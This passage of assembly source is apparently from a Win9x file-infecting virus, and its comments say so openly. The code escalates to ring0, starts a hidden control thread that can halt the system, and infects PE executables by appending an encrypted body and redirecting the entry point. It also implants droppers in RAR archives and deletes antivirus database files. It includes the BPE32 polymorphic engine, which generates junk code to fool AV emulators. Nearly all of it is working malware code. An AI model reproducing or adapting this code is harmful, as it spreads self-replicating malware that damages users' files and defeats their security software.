849.         stosd                                   ;save it
850.         mov ebx, cs                             ;fill registers with
851.         mov ecx, ds                             ;selectors for l8r use
852.         mov esi, es                             ;...
853.         mov edi, ss                             ;...
854.         push ds                                 ;save some selectors
855.         push es                                 ;...
856.         int 3                                   ;JuMpToRiNg0!
857.         pop es                                  ;restore selectors
858.         pop ds                                  ;...
859.         pop edi                                 ;restore ptr
860.         add edi, -4                             ;move with ptr
861.         pop dword ptr [edi+4]                   ;and restore IDT
862.         pop dword ptr [edi]                     ;...
863. p_jmp:  inc eax                                 ;some silly loop to fool
864.         cdq                                     ;some AVs. Will be overwritten
865.         jmp p_jmp                               ;with NOPs l8r by new thread
866.         popad                                   ;restore all regs
867.         jmp LeaveRing0                          ;and leave procedure
868.  
869. Thread Proc                                     ;thread procedure start here
870.         call tgdelta                            ;get delta offset
871. tgdelta:pop ebp
872.         mov [ebp + p_jmp - tgdelta], 90909090h  ;overwrite silly loop by NOPs
873.  
874.         push PC_WRITEABLE or PC_USER            ;reserve one page
875.         push 1                                  ;in shared memory
876.         push PR_SHARED                          ;for BGCB
877.         push 00010000h                          ;...
878.         call [ebp + VxDCall0 - tgdelta]         ;...
879.     inc eax
880.         je t_sleep                              ;error?
881.     dec eax
882.         cmp eax, 80000000h                      ;is it in shared memory ?
883.     jb free_pg
884.         mov ebx, eax                            ;save address
885.  
886.     push PC_WRITEABLE or PC_USER or PC_PRESENT or PC_FIXED
887.         push 0                                  ;and now we will commit
888.         push PD_ZEROINIT                        ;physical space in memory
889.         push 1                                  ;...
890.         shr eax, 0ch                            ;...
891.         push eax                                ;...
892.         push 00010001h                          ;...
893.         call [ebp + VxDCall0 - tgdelta]         ;...
894.         test eax, eax                           ;if error, free pages
895.         je free_pg                              ;and quit
896.  
897. ;some equates for BGCB
898.  
899. BGCB_Signature  equ     00                      ;BGCB signature ('BGCB')
900. BGCB_New        equ     04                      ;new request (1-new, 0 not)
901. BGCB_ID         equ     08                      ;ID of request
902. BGCB_Data       equ     12                      ;property data
903.  
904.                                                 ;EAX=1, ECX=0
905.         mov [ebx.BGCB_Signature], 'BCGB'        ;set signature
906. t_rep:  call t_sleep                            ;sleep for some ms
907.         cli                                     ;exclusive execution
908.         cmp [ebx.BGCB_New], ecx                 ;anything new?
909.         je t_end                                ;no
910.         mov [ebx.BGCB_New], ecx                 ;yeah, nulify item
911.         mov edx, [ebx.BGCB_ID]                  ;and check ID
912.         test edx, edx                           ;0?
913.         je p_test                               ;virus presency check
914.         dec edx                                 ;1?
915.         je i_test                               ;virus state checkin'
916.         dec edx                                 ;2?
917.         je d_test                               ;disable virus actions
918.         dec edx                                 ;3?
919.         je e_test                               ;enable virus actions
920.         dec edx                                 ;4?
921.         je g_test                               ;get sleep time
922.         dec edx                                 ;5?
923.         je si_test                              ;increase sleep time
924.         dec edx                                 ;6?
925.         je sd_test                              ;decrease sleep time
926.         dec edx                                 ;7?
927.         je k_test                               ;system halt
928.         dec edx                                 ;8?
929.         je ds_test                              ;disconnect
930. t_end:  sti                                     ;allow INTs
931.         jmp t_rep                               ;and sleep
932.  
933. p_test: mov [ebx.BGCB_Data], eax                ;set BGCB data to 1
934.     jmp t_end
935.  
936. i_test: mov byte ptr [ebx.BGCB_Data], 0         ;set BGCB data to v_state
937. v_state = byte ptr $ - 1
938.     jmp t_end
939.  
940. d_test: mov word ptr [ebp + VxDCall_hook - tgdelta], 0ebh+((farjmp-VxDCall_hook-2)shl 8)
941.         jmp t_end                               ;construct JMP to end
942.  
943. e_test: mov word ptr [ebp + VxDCall_hook - tgdelta], 0e860h
944.         jmp t_end                               ;reconstruct original bytes
945.  
946. g_test: mov edx, [ebp + sleep_t - tgdelta]      ;get sleep time
947.         mov [ebx.BGCB_Data], edx                ;store it in BGCB data
948.     jmp t_end
949.  
950. si_test:mov edx, [ebx.BGCB_Data]                ;get increment
951.         add [ebp + sleep_t - tgdelta], edx      ;add it to sleep time
952.     jmp t_end
953.  
954. sd_test:mov edx, [ebx.BGCB_Data]                ;get decrement
955.         sub [ebp + sleep_t - tgdelta], edx      ;substract sleep time with it
956.     jmp t_end
957.  
958. k_test: cli                                     ;halt system
959. _hlt_:  jmp _hlt_
960.  
961. ds_test:sti                                     ;allow INTs
962.         push 0                                  ;decommit page
963.     push 1
964.     push ebx
965.     push 00010002h
966.     call [ebp + VxDCall0 - tgdelta]
967. free_pg:push 0                                  ;free page
968.     push ebx
969.     push 0001000ah
970.     call [ebp + VxDCall0 - tgdelta]
971.  
972.         push -1                                 ;sleep thread for ever
973. sleep:  push 002a0009h                          ;service Sleep
974.         call [ebp + VxDCall0 - tgdelta]         ;call it
975.         popad                                   ;restore all regs
976.         ret                                     ;return
977. t_sleep:pushad                                  ;save all regs
978.         push 1000                               ;one second long sleep time
979. sleep_t = dword ptr $ - 4
980.         jmp sleep                               ;sleep
981. Thread EndP                                     ;thread ends here
982.  
983.  
984. infect: mov esi, edx                            ;ESI=EDI
985. infct2: mov byte ptr [ebp + semaphore - mgdelta], 0   ;set semaphore
986.         mov word ptr [ebp + ipatch - mgdelta], 9090h  ;patch int21h
987.         xor ecx, ecx                            ;ECX=0
988.         mov cl, 1                               ;CL=r0_patch
989. r0_patch = byte ptr $ - 1                       ;ring0 procedure is called
990.         jecxz LeaveRing0                        ;only once
991.  
992.         call EnterRing0                         ;EnTeRrInG0
993.         push 0                                  ;Now we will create new
994.         lea edx, [ebp + callback - mgdelta]     ;VMM thread
995.         push edx                                ;callback function
996.         push 'tA92'                             ;thread type
997.         push esi                                ;ES
998.         push ecx                                ;DS
999.         lea edx, [ebp + Thread - mgdelta]       ;EIP
1000.         push edx                                ;...
1001.         push ebx                                ;CS
1002.         lea edx, [ebp + threadstack - mgdelta]  ;ESP
1003.         push edx                                ;...
1004.         push edi                                ;SS
1005.         int 20h                                 ;VMMCall
1006.         dd 00010105h                            ;VMMCreateThread
1007.         sub esp, -24h                           ;correct stack
1008.         mov byte ptr [ebp + r0_patch - mgdelta], 0    ;patch
1009.         iretd                                   ;return from INT
1010.  
1011. LeaveRing0:
1012.         call check_name                         ;check filename
1013. ;MODIFY ON YOUR OWN RISC!
1014.         jc exit_infection                       ;error?
1015. ;       jmp exit_infection
1016.         mov [ebp + tmpext - mgdelta], eax       ;save extension
1017.  
1018.         mov eax, 7143h                          ;LFN retrieve
1019.         xor ebx, ebx                            ;attributes
1020.     call int21h
1021.     jc exit_infection
1022.         mov [ebp + file_attr - mgdelta], ecx    ;save them
1023.  
1024.         mov eax, 7143h                          ;LFN set attributes
1025.     inc ebx
1026.     xor ecx, ecx
1027.         call int21h                             ;set them
1028.     jc exit_infection
1029.  
1030.         mov eax, 7143h                          ;LFN retrieve time/date
1031.     inc ebx
1032.     inc ebx
1033.     inc ebx
1034.     call int21h
1035.     jc exit_infection
1036.         mov [ebp + file_time - mgdelta], ecx    ;save it
1037.     mov [ebp + file_date - mgdelta], edi
1038.  
1039.         mov eax, 716ch                          ;LFN extended Create/
1040.         mov esi, edx                            ;/Open file
1041.     dec ebx
1042.     dec ebx
1043.         xor ecx, ecx                            ;ECX=0
1044.         cdq                                     ;EDX=0
1045.         inc edx                                 ;EDX=1
1046.         call int21h                             ;open file for R/W
1047.     jc exit_infection
1048.     xchg ebx, eax
1049.  
1050.         mov eax, 12345678                       ;get extension
1051. tmpext = dword ptr $ - 4
1052.         cmp ah, 'R'                             ;is it ".RAR" ?
1053.         je try_RAR                              ;yeah, infect RAR
1054.  
1055. ;Now we will test for Pentium+ processor
1056.         pushad                                  ;save all regs
1057.         pushfd                                  ;save EFLAGS
1058.         pop eax                                 ;get them
1059.         mov ecx, eax                            ;save them
1060.         or eax, 200000h                         ;flip ID bit in EFLAGS
1061.         push eax                                ;store
1062.         popfd                                   ;flags
1063.         pushfd                                  ;get them back
1064.         pop eax                                 ;...
1065.         xor eax, ecx                            ;same?
1066.         je end_cc                               ;shit, we r on 486-
1067.         xor eax, eax                            ;EAX=0
1068.         inc eax                                 ;EAX=1
1069.         cpuid                                   ;CPUID
1070.         and eax, 111100000000b                  ;mask processor family
1071.         cmp ah, 4                               ;is it 486?
1072.         je end_cc                               ;baaaaaaad
1073.         popad                                   ;no, Pentium installed
1074.  
1075.         mov byte ptr [ebp + v_state - mgdelta], BG_INFECTINEXEC ;set state
1076.         push IMAGE_SIZEOF_DOS_HEADER            ;MZ header
1077.     pop ecx
1078.         call read_something                     ;read it
1079.     jc close_file
1080.  
1081.     cmp word ptr [ebp + header - mgdelta], IMAGE_DOS_SIGNATURE
1082.         jne close_file                          ;is it really MZ header?
1083.     cmp word ptr [ebp + header.MZ_res2 - mgdelta], 29ah
1084. bg_sig = word ptr $ - 2                         ;already infected?
1085.     je close_file
1086.  
1087.         call seek_eof                           ;get file size
1088.         jc close_file
1089.         mov [ebp + fsize - mgdelta], eax        ;save it
1090.  
1091.         cmp eax, 1000h                          ;is it smaller than
1092.         jb close_file                           ;4096 bytes?
1093.         mov edx, 400000h                              
1094.         cmp edx, eax                            ;too large?
1095.     jb close_file
1096.  
1097.         mov edx, [ebp + header.MZ_lfanew - mgdelta]   ;get ptr to PE header
1098.         mov [ebp + MZlfanew - mgdelta], edx     ;save it
1099.     xchg eax, edx
1100.         cmp eax, edx                            ;points inside file?
1101.         jnb close_file                          ;no, invalid ptr
1102.  
1103.         call seek_here                          ;seek to MZ_lfanew
1104.     mov ecx, 4+IMAGE_SIZEOF_FILE_HEADER+IMAGE_SIZEOF_NT_OPTIONAL_HEADER
1105.         call read_something                     ;read whole PE header
1106.     jc close_file
1107.  
1108.     cmp dword ptr [ebp + header - mgdelta], IMAGE_NT_SIGNATURE
1109.         jne close_file                          ;is it PE\0\0?
1110.  
1111.     cmp word ptr [ebp + header.NT_FileHeader.FH_Machine - mgdelta], \
1112.                 IMAGE_FILE_MACHINE_I386         ;must i386 compatible
1113.     jne close_file
1114.  
1115.     mov eax, [ebp + header.NT_FileHeader.FH_Characteristics - mgdelta]
1116.     not al
1117.     test ax, IMAGE_FILE_EXECUTABLE_IMAGE or IMAGE_FILE_DLL
1118.         jne close_file                          ;must be EXEC, mustnt be DLL
1119.  
1120.     cmp [ebp + header.NT_OptionalHeader.OH_ImageBase - mgdelta], 400000h
1121.         jne close_file                          ;must be 400000h
1122.  
1123.         movzx esi, word ptr [ebp + header.NT_FileHeader.FH_SizeOfOptionalHeader - mgdelta]
1124.     movzx edx, word ptr [ebp + header.NT_FileHeader.FH_NumberOfSections - mgdelta]
1125.     dec edx
1126.         imul edx, IMAGE_SIZEOF_SECTION_HEADER   ;ptr to last section
1127.     mov eax, 12345678h
1128. MZlfanew = dword ptr $ - 4
1129.     sub eax, -IMAGE_SIZEOF_FILE_HEADER-4
1130.     add eax, esi
1131.     add eax, edx
1132.     mov [ebp + sh_pos - mgdelta], eax
1133.         call seek_here                          ;seek to last section header
1134.  
1135.     push IMAGE_SIZEOF_SECTION_HEADER
1136.     pop ecx
1137.     lea edx, [ebp + section_header - mgdelta]
1138.         call r_something                        ;read last section header
1139.     jc close_file
1140.  
1141.         mov eax, virtual_end-Start              ;size of file in memory
1142.         mov esi, [ebp + section_header.SH_SizeOfRawData - mgdelta]
1143.     lea edx, [ebp + section_header.SH_VirtualSize - mgdelta]
1144.         add [edx], eax                    ;new VirtualSize, set WRITE bit
1145.         or byte ptr [ebp + section_header.SH_Characteristics.hiw.hib - mgdelta], 0c0h
1146.         add eax, [edx]                          ;now we will align some items
1147.     mov ecx, [ebp + header.NT_OptionalHeader.OH_FileAlignment - mgdelta]
1148.         cdq                                     ;in PE header
1149.         div ecx
1150.         inc eax
1151.     mul ecx
1152.     add [ebp + section_header.SH_SizeOfRawData - mgdelta], eax
1153.         sub eax, esi                            ;new SizeOfRawData
1154.     mov [ebp + header.NT_OptionalHeader.OH_SizeOfImage - mgdelta], eax
1155.                                                 ;new SizeOfImage
1156.         mov eax, 12345678h                      ;ptr to last section header
1157. sh_pos = dword ptr $ - 4
1158.         call seek_here                          ;seek there
1159.  
1160.         push IMAGE_SIZEOF_SECTION_HEADER        ;write modified section
1161.         pop ecx                                 ;header
1162.     lea edx, [ebp + section_header - mgdelta]
1163.         call write_something                    ;...
1164.  
1165.         call seek_here                          ;seek to MZ_res2
1166.         push 2                                  ;and write there
1167.         pop ecx                                 ;already infected
1168.         lea edx, [ebp + bg_sig - mgdelta]       ;mark
1169.         call write_something                    ;...
1170.         push 4                                  ;write there original
1171.         pop ecx                                 ;entrypoint also
1172.     lea edx, [ebp + header.NT_OptionalHeader.OH_AddressOfEntryPoint - mgdelta]
1173.         call write_something                    ;...
1174.  
1175.         mov eax, [ebp + MZlfanew - mgdelta]     ;seek to PE header
1176.     call seek_here
1177.  
1178.         mov eax, 12345678h                      ;get file size
1179. fsize = dword ptr $ - 4
1180.     add eax, [ebp + section_header.SH_VirtualAddress - mgdelta]
1181.     sub eax, [ebp + section_header.SH_PointerToRawData - mgdelta]
1182.     mov [ebp + header.NT_OptionalHeader.OH_AddressOfEntryPoint - mgdelta], eax
1183.                                                 ;modify Entrypoint
1184.     push IMAGE_SIZEOF_FILE_HEADER+4+5eh
1185.     pop ecx
1186.     lea edx, [ebp + header - mgdelta]
1187.         call write_something                    ;write modified PE header
1188.  
1189.         call seek_eof                           ;seek to end of file
1190.         lea edi, [ebp + crypted_virus - mgdelta] ;address of encrypted virus
1191.         xor ecx, ecx                            ;ECX=0
1192.         mov cl, 1                               ;CL=f_poly
1193. f_poly = byte ptr $ - 1                         ;poly-engine ran once ?
1194.         jecxz end_poly                          ;yeah, copy virus only
1195.  
1196.         mov esi, 12345678h                      ;get start of virus in memory
1197. mem_addr = dword ptr $ - 4
1198.         mov ecx, 6c0h                           ;aproximated size of virus
1199.     call BPE32
1200.         mov byte ptr [ebp + f_poly - mgdelta], 0 ;set poly semaphore
1201.         mov byte ptr [ebp + do_RAR - mgdelta], 1 ;enable RAR infection
1202. end_poly:
1203.         mov ecx, 2000h                          ;8192 bytes
1204.         mov edx, edi                            ;where?
1205.         call write_something                    ;write 8192 bytes of virus
1206.         jmp close_file                          ;to file and quit
1207.  
1208. end_cc: popad                                   ;restore all registers
1209. close_file:                                      
1210.         mov ah, 3eh                             ;close file
1211.         call int21h                             ;...
1212.  
1213.         mov eax, 7143h                          ;LFN set file time/date
1214.     push 3
1215.     pop ebx
1216.     lea edx, [ebp + targetname - mgdelta]
1217.         mov ecx, 12345678h                      ;original time
1218. file_time = dword ptr $ - 4
1219.         mov edi, 12345678h                      ;original date
1220. file_date = dword ptr $ - 4
1221.         call int21h                             ;set it back
1222.  
1223.         mov eax, 7143h                          ;LFN set file attributes
1224.     dec ebx
1225.     dec ebx
1226.         mov ecx, 12345678h                      ;original file attributes
1227. file_attr = dword ptr $ - 4
1228.         call int21h                             ;set it back
1229.  
1230. ;now we will delete some AV databases
1231.         lea esi, [ebp + ShItTyFiLeZ - mgdelta]  ;start of file names
1232.         push 5                                  ;number of them
1233.     pop ecx
1234. DeLiT:  push ecx                                ;save count
1235.     mov edx, esi
1236.         mov eax, 4301h                          ;set file attributes
1237.         xor ecx, ecx                            ;blank them
1238.         call int21h                             ;...
1239.         mov ah, 41h                             ;and delete file
1240.         call int21h                             ;...
1241.         pop ecx                                 ;restore count
1242. end_sz: lodsb                                   ;get
1243.         test al, al                             ;end of
1244.         jne end_sz                              ;string
1245.         loop DeLiT                              ;delete files in a loop
1246.         jmp exit_infection                      ;and exit
1247.  
1248. try_RAR:
1249.         mov byte ptr [ebp + v_state - mgdelta], BG_INFECTINRAR ;set v_state
1250.         xor ecx, ecx                            ;ECX=0
1251.         mov cl, 0                               ;CL=do_RAR
1252. do_RAR = byte ptr $ - 1                         ;before infectin RAR we must
1253.         jecxz close_file                        ;infect at least one EXE
1254.                                                 ;to initialize poly
1255. ;now we will check, if last file in RAR has our name. If has, RAR is already
1256. ;infected and we wont infect it again.
1257.         call seek_eof                           ;go to the end of file
1258.     jc close_file
1259.         add eax, -3000h-8                       ;go to the EOF-3000h-8
1260.         call seek_here                          ;...
1261.     jc close_file
1262.         lea edx, [ebp + tmpname - mgdelta]      ;read 8 bytes from that
1263.         push 8                                  ;location to temporary buffer
1264.         pop ecx                                 ;...
1265.         call r_something                        ;...
1266.     jc close_file
1267.         push 2                                  ;compare 8 bytes of filename
1268.         pop ecx
1269.     mov esi, edx
1270.     lea edi, [ebp + RARName - mgdelta]
1271. n_cmp2: cmpsd
1272.         jne inf_RAR                             ;not match, we can infect it
1273.         loop n_cmp2
1274.         jmp close_file                          ;RAR already infected, quit
1275.  
1276. inf_RAR:call seek_eof                           ;got to the end of file
1277.         lea esi, [ebp + d1start - mgdelta]      ;get start of dropper part 1
1278.         lea edi, [ebp + virus_in_arc - mgdelta] ;destination
1279.         push edi                                ;save it for l8r use
1280.         mov ecx, d1size                         ;how many bytes
1281.         rep movsb                               ;copy dropper part 1
1282.         lea esi, [ebp + crypted_virus - mgdelta] ;get start of encrypted virus
1283.         mov ecx, 2000h                          ;8192 bytes
1284.         rep movsb                               ;copy virus
1285.         lea esi, [ebp + d2start - mgdelta]      ;get start of dropper part 2
1286.         mov ecx, d2size                         ;how many bytes
1287.         rep movsb                               ;copy dropper part 2
1288.         pop esi                                 ;get address of dropper
1289.         mov edi, 3000h                          ;size of dropper
1290.         call CRC32                              ;calculate CRC32
1291.         mov [ebp + RARCRC32 - mgdelta], eax     ;save it
1292.  
1293.         lea esi, [ebp + RARHeaderCRC + 2 - mgdelta] ;start of RAR header
1294.         mov edi, end_RAR-RARHeader-2            ;size
1295.         call CRC32                              ;calculate CRC32 of header
1296.         mov [ebp + RARHeaderCRC - mgdelta], ax  ;save it
1297.  
1298.         mov ecx, end_RAR-RARHeader              ;size of RAR header
1299.         lea edx, [ebp + RARHeader - mgdelta]    ;start of RAR header
1300.         call write_something                    ;write RAR header to file
1301.  
1302.         mov ecx, 3000h                          ;dropper size
1303.         lea edx, [ebp + virus_in_arc - mgdelta] ;start of dropper
1304.         call write_something                    ;write dropper to file
1305.         jmp close_file                          ;and close file
1306.  
1307.  
1308. c_name: push edi                                ;save EDI
1309.         lea edi, [ebp + targetname - sgdelta]   ;address of filename
1310.     jmp cname                                                    
1311. check_name:
1312.         push edi                                ;save EDI
1313.         lea edi, [ebp + targetname - mgdelta]   ;address of filename
1314. cname:  mov edx, edi                            ;...
1315.         mov ecx, MAX_PATH                       ;size of filename
1316.     cld
1317. n_loop: lodsb                                   ;load byte
1318.         cmp al, 'a'                             ;is it BIG letter?
1319.         jb nlower                               ;yeah
1320.         cmp al, 'z'                             ;is it letter?
1321.         ja nlower                               ;no
1322.         add al, 'A'-'a'                         ;upper letter
1323. nlower: stosb                                   ;save letter
1324.         test al, al                             ;is it end?
1325.         je e_name                               ;yeah
1326.         cmp al, '\'                             ;is it backslash
1327.         jne nloop                               ;no
1328. nloop:  loop n_loop                             ;upper letters in loop
1329. i_name: pop edi                                 ;restore EDI
1330.         stc                                     ;set error flag
1331.         ret                                     ;and return
1332. e_name: mov eax, [edi-5]                        ;get extension
1333.         cmp eax, 'EXE.'                         ;is it .EXE
1334.     je n_name
1335.         cmp eax, 'RCS.'                         ;is it .SCR
1336.     je n_name
1337.         cmp eax, 'RAR.'                         ;is it .RAR
1338.     je n_name
1339.         cmp eax, 'XFS.'                         ;is it .SFX
1340.     je n_name
1341.         cmp eax, 'LPC.'                         ;is it .CPL
1342.         je n_name
1343.         cmp eax, 'KAB.'                         ;is it .BAK
1344.     je n_name
1345.         cmp eax, 'TAD.'                         ;is it .DAT
1346.         jne i_name                              
1347. n_name: pop edi                                 ;restore EDI
1348. callback:
1349.         clc                                     ;clear error flag
1350.         ret                                     ;and return
1351.  
1352. seek_here:                                      ;seek to EAX
1353.         mov ecx, eax                            ;ECX=EAX
1354.         shr ecx, 16                             ;CX=MSW of EAX
1355.         movzx edx, ax                           ;DX=LSW of EAX
1356.         xor eax, eax                            ;EAX=0
1357.         jmp seek                                ;seek
1358. seek_eof:
1359.         mov al, 02h                             ;AL=2h
1360.         cdq                                     ;EDX=0
1361.         xor ecx, ecx                            ;ECX=0
1362. seek:   mov ah, 42h                             ;AH=42h
1363.         call int21h                             ;seek
1364.         jc q_seek                               ;error?
1365.         movzx eax, ax                           ;EAX=LSW of EAX
1366.         shl edx, 16
1367.         or eax, edx                             ;EAX=LSW of EAX & MSW of EDX
1368.         cdq                                     ;EDX=0
1369.         clc                                     ;clear error flag
1370. q_seek: ret                                     ;return
1371.  
1372. CRC32:  push ebx                                ;I found this code in Int13h's
1373.         xor ecx, ecx                            ;tutorial about infectin'
1374.         dec ecx                                 ;archives. Int13h found this
1375.         mov edx, ecx                            ;code in Vecna's Inca virus.
1376. NextByteCRC:                                    ;So, thank ya guys...
1377.         xor eax, eax                            ;Ehrm, this is very fast
1378.         xor ebx, ebx                            ;procedure to code CRC32 at
1379.         lodsb                                   ;runtime, no need to use big
1380.         xor al, cl                              ;tables.
1381.     mov cl, ch
1382.     mov ch, dl
1383.     mov dl, dh
1384.     mov dh, 8
1385. NextBitCRC:
1386.     shr bx, 1
1387.     rcr ax, 1
1388.     jnc NoCRC
1389.     xor ax, 08320h
1390.     xor bx, 0edb8h
1391. NoCRC:  dec dh
1392.     jnz NextBitCRC
1393.     xor ecx, eax
1394.     xor edx, ebx
1395.         dec edi
1396.     jne NextByteCRC
1397.     not edx
1398.     not ecx
1399.     pop ebx
1400.     mov eax, edx
1401.     rol eax, 16
1402.     mov ax, cx
1403.     ret
1404.  
1405. ;BPE32 (Benny's Polymorphic Engine for Win32) starts here. U can find first
1406. ;version of BPE32 in DDT#1 e-zine. But unfortunately, how it usualy goes,
1407. ;there were TWO, REALLY SILLY/TINY bugs. I found them and corrected them. So,
1408. ;if u wanna use BPE32 in your code, use this version, not that version from
1409. ;DDT#1. Very BIG sorry to everyone, who had/has/will have problems with it.
1410.  
1411. BPE32   Proc
1412.     pushad                  ;save all regs
1413.     push edi                ;save these regs for l8r use
1414.     push ecx                ;   ...
1415.     mov edx, edi                ;   ...
1416.     push esi                ;preserve this reg
1417.     call rjunk              ;generate random junk instructions
1418.     pop esi                 ;restore it
1419.     mov al, 0e8h                ;create CALL instruction
1420.     stosb                   ;   ...
1421.     mov eax, ecx                ;   ...
1422.     imul eax, 4             ;   ...
1423.     stosd                   ;   ...
1424.  
1425.     mov eax, edx                ;calculate size of CALL+junx
1426.     sub edx, edi                ;   ...
1427.     neg edx                 ;   ...
1428.     add edx, eax                ;   ...
1429.     push edx                ;save it
1430.  
1431.     push 0                  ;get random number
1432.     call random             ;   ...
1433.     xchg edx, eax
1434.     mov [ebp + xor_key - mgdelta], edx  ;use it as xor constant
1435.     push 0                  ;get random number
1436.     call random             ;   ...
1437.     xchg ebx, eax
1438.     mov [ebp + key_inc - mgdelta], ebx  ;use it as key increment constant
1439. x_loop: lodsd                   ;load DWORD
1440.     xor eax, edx                ;encrypt it
1441.     stosd                   ;store encrypted DWORD
1442.     add edx, ebx                ;increment key
1443.     loop x_loop             ;next DWORD
1444.  
1445.     call rjunk              ;generate junx
1446.  
1447.     mov eax, 0006e860h          ;generate SEH handler
1448.     stosd                   ;   ...
1449.     mov eax, 648b0000h          ;   ...
1450.     stosd                   ;   ...
1451.     mov eax, 0ceb0824h          ;   ...
1452.     stosd                   ;   ...
1453.  
1454. greg0:  call get_reg                ;get random register
1455.     cmp al, 5               ;MUST NOT be EBP register
1456.     je greg0
1457.     mov bl, al              ;store register
1458.     mov dl, 11              ;proc parameter (do not generate MOV)
1459.     call make_xor               ;create XOR or SUB instruction
1460.     inc edx                 ;destroy parameter
1461.     mov al, 64h             ;generate FS:
1462.     stosb                   ;store it
1463.     mov eax, 896430ffh          ;next SEH instructions
1464.     or ah, bl               ;change register
1465.     stosd                   ;store them
1466.     mov al, 20h             ;   ...
1467.     add al, bl              ;   ...
1468.     stosb                   ;   ...
1469.  
1470.     push 2                  ;get random number
1471.     call random
1472.     test eax, eax
1473.     je _byte_
1474.     mov al, 0feh                ;generate INC DWORD PTR
1475.     jmp _dw_
1476. _byte_: mov al, 0ffh                ;generate INC BYTE PTR
1477. _dw_:   stosb                   ;store it
1478.     mov al, bl              ;store register
1479.     stosb                   ;   ...
1480.     mov al, 0ebh                ;generate JUMP SHORT
1481.     stosb                   ;   ...
1482.     mov al, -24d                ;generate jump to start of code (trick
1483.         stosb                                   ;for better emulators, e.g. NODICE32)
1484.  
1485.     call rjunk              ;generate junx
1486. greg1:  call get_reg                ;generate random register
1487.     cmp al, 5               ;MUST NOT be EBP
1488.     je greg1
1489.     mov bl, al              ;store it
1490.  
1491.     call make_xor               ;generate XOR,SUB reg, reg or MOV reg, 0
1492.  
1493.     mov al, 64h             ;next SEH instructions
1494.     stosb                   ;   ...
1495.     mov al, 8fh             ;   ...
1496.     stosb                   ;   ...
1497.     mov al, bl              ;   ...
1498.     stosb                   ;   ...
1499.     mov al, 58h             ;   ...
1500.     add al, bl              ;   ...
1501.     stosb                   ;   ...
1502.  
1503.     mov al, 0e8h                ;generate CALL
1504.     stosb                   ;   ...
1505.     xor eax, eax                ;   ...
1506.     stosd                   ;   ...
1507.     push edi                ;store for l8r use
1508.     call rjunk              ;call junk generator
1509.  
1510.     call get_reg                ;random register
1511.     mov bl, al              ;store it
1512.     push 1                  ;random number (0-1)
1513.     call random             ;   ...
1514.     test eax, eax
1515.     jne next_delta
1516.  
1517.     mov al, 8bh             ;generate MOV reg, [ESP]; POP EAX
1518.     stosb
1519.     mov al, 80h
1520.     or al, bl
1521.     rol al, 3
1522.     stosb
1523.     mov al, 24h
1524.     stosb
1525.     mov al, 58h
1526.     jmp bdelta
1527.  
1528. next_delta:
1529.     mov al, bl              ;generate POP reg; SUB reg, ...
1530.     sub al, -58h
1531. bdelta: stosb
1532.     mov al, 81h
1533.     stosb
1534.     mov al, 0e8h
1535.     add al, bl
1536.     stosb
1537.     pop eax
1538.     stosd
1539.     call rjunk              ;random junx
1540.  
1541.     xor bh, bh              ;parameter (first execution only)
1542.     call greg2              ;generate MOV sourcereg, ...
1543.     mov al, 3               ;generate ADD sourcereg, deltaoffset
1544.     stosb                   ;   ...
1545.     mov al, 18h             ;   ...
1546.     or al, bh               ;   ...
1547.     rol al, 3               ;   ...
1548.     or al, bl               ;   ...
1549.     stosb                   ;   ...
1550.     mov esi, ebx                ;store EBX
1551.     call greg2              ;generate MOV countreg, ...
1552.     mov cl, bh              ;store count register
1553.     mov ebx, esi                ;restore EBX
1554.  
1555.     call greg3              ;generate MOV keyreg, ...
1556.     push edi                ;store this position for jump to decryptor
1557.     mov al, 31h             ;generate XOR [sourcereg], keyreg
1558.     stosb                   ;   ...
1559.     mov al, ch              ;   ...
1560.     rol al, 3               ;   ...
1561.     or al, bh               ;   ...
1562.     stosb                   ;   ...
1563.  
1564.     push 6                  ;this stuff will choose ordinary of calls
1565.     call random             ;to code generators
1566.     test eax, eax
1567.     je g5                   ;GREG4 - key incremention
1568.     cmp al, 1               ;GREG5 - source incremention
1569.     je g1                   ;GREG6 - count decremention
1570.     cmp al, 2               ;GREG7 - decryption loop
1571.     je g2
1572.     cmp al, 3
1573.     je g3
1574.     cmp al, 4
1575.     je g4
1576.  
1577. g0: call gg1
1578.     call greg6
1579.     jmp g_end
1580. g1: call gg2
1581.     call greg5
1582.     jmp g_end
1583. g2: call greg5
1584.     call gg2
1585.     jmp g_end
1586. g3: call greg5
1587. gg3:    call greg6
1588.     jmp g_out
1589. g4: call greg6
1590.     call gg1
1591.     jmp g_end
1592. g5: call greg6
1593.     call greg5
1594. g_out:  call greg4
1595. g_end:  call greg7
1596.     mov al, 61h             ;generate POPAD instruction
1597.     stosb                   ;   ...
1598.     call rjunk              ;junk instruction generator
1599.     mov al, 0c3h                ;RET instruction
1600.     stosb                   ;   ...
1601.     pop eax                 ;calculate size of decryptor and encrypted data
1602.     sub eax, edi                ;   ...
1603.     neg eax                 ;   ...
1604.     mov [esp.Pushad_eax], eax       ;store it to EAX register
1605.     popad                   ;restore all regs
1606.     ret                 ;and thats all folx
1607. get_reg proc                    ;this procedure generates random register
1608.     push 8                  ;random number (0-7)
1609.     call random             ;   ...
1610.     test eax, eax
1611.     je get_reg              ;MUST NOT be 0 (=EAX is used as junk register)
1612.     cmp al, 100b                ;MUST NOT be ESP
1613.     je get_reg
1614.     ret
1615. get_reg endp
1616. make_xor proc                   ;this procedure will generate instruction, that
1617.     push 3                  ;will nulify register (BL as parameter)
1618.     call random
1619.     test eax, eax
1620.     je _sub_
1621.     cmp al, 1
1622.     je _mov_
1623.     mov al, 33h             ;generate XOR reg, reg
1624.     jmp _xor_
1625. _sub_:  mov al, 2bh             ;generate SUB reg, reg
1626. _xor_:  stosb
1627.     mov al, 18h
1628.     or al, bl
1629.     rol al, 3
1630.     or al, bl
1631.     stosb
1632.     ret
1633. _mov_:  cmp dl, 11              ;generate MOV reg, 0
1634.     je make_xor
1635.     mov al, 0b8h
1636.     add al, bl
1637.     stosb
1638.     xor eax, eax
1639.     stosd
1640.     ret
1641. make_xor endp
1642. gg1:    call greg4
1643.     jmp greg5
1644. gg2:    call greg4
1645.     jmp greg6
1646.  
1647. random  proc                    ;this procedure will generate random number
1648.                         ;in range from 0 to pushed_parameter-1
1649.                         ;0 = do not truncate result
1650.     push edx                ;save EDX
1651.     db 0fh, 31h             ;RDTCS instruction - reads PSs tix and stores
1652.                         ;number of them into pair EDX:EAX
1653.     xor edx, edx                ;nulify EDX, we need only EAX
1654.     cmp [esp+8], edx            ;is parameter==0 ?
1655.     je r_out                ;yeah, do not truncate result
1656.     div dword ptr [esp+8]           ;divide it
1657.     xchg eax, edx               ;remainder as result
1658. r_out:  pop edx                 ;restore EDX
1659.     ret Pshd                ;quit procedure and destroy pushed parameter
1660. random  endp
